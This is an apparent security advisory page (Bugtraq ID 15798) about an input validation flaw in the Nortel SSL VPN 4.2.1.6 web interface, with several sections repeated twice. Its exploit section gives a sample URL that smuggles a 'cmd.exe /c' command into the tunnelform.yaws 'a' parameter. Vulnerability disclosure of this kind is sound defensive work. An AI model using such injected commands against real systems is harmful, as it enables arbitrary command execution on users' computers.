Nortel SSL VPN Web Interface Input Validation Vulnerability
BID:15798
Info
Nortel SSL VPN Web Interface Input Validation Vulnerability
| Bugtraq ID: | 15798 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 12 2005 12:00AM |
| Updated: | Dec 12 2005 12:00AM |
| Credit: | Discovered by Daniel Fabian. |
| Vulnerable: |
Nortel Networks SSL VPN 4.2.1 .6 |
| Not Vulnerable: | |
Discussion
Nortel SSL VPN Web Interface Input Validation Vulnerability
Nortel SSL VPN is prone to an input validation vulnerability. This issue could be exploited to cause arbitrary commands to be executed on a user's computer. Cross-site scripting attacks are also possible.
Nortel SSL VPN 4.2.1.6 is vulnerable to this issue; other versions may also be affected.
Nortel SSL VPN is prone to an input validation vulnerability. This issue could be exploited to cause arbitrary commands to be executed on a user's computer. Cross-site scripting attacks are also possible.
Nortel SSL VPN 4.2.1.6 is vulnerable to this issue; other versions may also be affected.
Exploit / POC
Nortel SSL VPN Web Interface Input Validation Vulnerability
An exploit is not required.
The following example was provided:
https://SSL_VPN_SERVER/tunnelform.yaws?a=+cmd.exe+/c+echo+test+%3E+c:\\test.txt+&type=Custom&sp=443&n=1&ph=&pp=&0tm=tcp&0lh=127.0.0.1&0lp=8080&0hm=&0rh=10.10.10.10&0rp=80&sslEnabled=on&start=Start...
An exploit is not required.
The following example was provided:
https://SSL_VPN_SERVER/tunnelform.yaws?a=+cmd.exe+/c+echo+test+%3E+c:\\test.txt+&type=Custom&sp=443&n=1&ph=&pp=&0tm=tcp&0lh=127.0.0.1&0lp=8080&0hm=&0rh=10.10.10.10&0rp=80&sslEnabled=on&start=Start...
Solution / Fix
Nortel SSL VPN Web Interface Input Validation Vulnerability
Solution:
This issue was reportedly addressed in SSL VPN 5.1.5, however, this has not been confirmed by Symantec.
------
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
This issue was reportedly addressed in SSL VPN 5.1.5, however, this has not been confirmed by Symantec.
------
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Nortel SSL VPN Web Interface Input Validation Vulnerability
References:
References:
- SSL VPN Product Page (Nortel Networks)